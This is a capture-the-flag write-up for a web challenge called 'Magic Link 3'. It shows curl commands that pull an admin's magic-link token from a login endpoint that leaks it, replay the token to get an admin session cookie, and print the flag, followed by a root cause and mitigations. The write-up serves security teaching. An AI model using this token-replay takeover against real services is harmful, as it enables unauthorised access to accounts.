Skip to main content

Magic Link 3

Challenge

Content preserved from the original writeup source. Minimal normalization was applied to fit platform format.

Solution

Original Writeup Content (Preserved)

Magic Link 3 Writeup

Challenge: bluehens-magic-link.chals.io
Category: Web
Points: 100
Flag format: udctf{}

Summary

The application returns a valid login UUID for any registered email through POST /login, including the admin account. Replaying that UUID at /login/<uuid> creates an authenticated session cookie. Visiting /dashboard with that cookie reveals the flag.

Recon

  1. Opened / and observed the magic-link login flow posting to /login.
  2. Submitted admin@udctf.com to /login and received JSON containing a uuid.
  3. Tested the magic-link endpoint with that value: /login/<uuid>.
  4. The response set a signed Flask session cookie for admin@udctf.com and redirected to /dashboard.

Exploitation

curl -sS -X POST https://bluehens-magic-link.chals.io/login -d 'email=admin@udctf.com'

Example response:

{
  "datetime": "2026-04-17T19:13:54.000000+00:00",
  "email": "admin@udctf.com",
  "ip-address": "10.1.0.21",
  "message": "Magic link generated, check your email.",
  "uuid": "dkoU2P4s15I2Z7wo9P-pmQ"
}

2) Replay the UUID to create authenticated session

curl -sS -i "https://bluehens-magic-link.chals.io/login/dkoU2P4s15I2Z7wo9P-pmQ" -c /tmp/ml3_cookie.txt

Important behavior:

  • 302 redirect to /dashboard
  • Set-Cookie: session=... issued for admin user context
curl -sS -i https://bluehens-magic-link.chals.io/dashboard -b /tmp/ml3_cookie.txt

Response included:

<h1>Welcome Admin</h1>
<p>Flag: udctf{y0u_4r3_m4g1c_l1nk_m4st3r}</p>

Flag

udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Root Cause

  • Sensitive login artifact (uuid) is returned directly to the client.
  • UUID can be replayed immediately as a bearer login token.
  • No additional proof-of-possession step (email inbox control) is required before issuing session.

Mitigations

  1. Never return raw magic-link tokens in API responses.
  2. Deliver login links only through out-of-band channel (email) and keep token server-side hashed.
  3. Bind token use to strict constraints (single use, short TTL, IP/device checks where appropriate).
  4. Add abuse controls (rate limits, anomaly detection, account lock heuristics).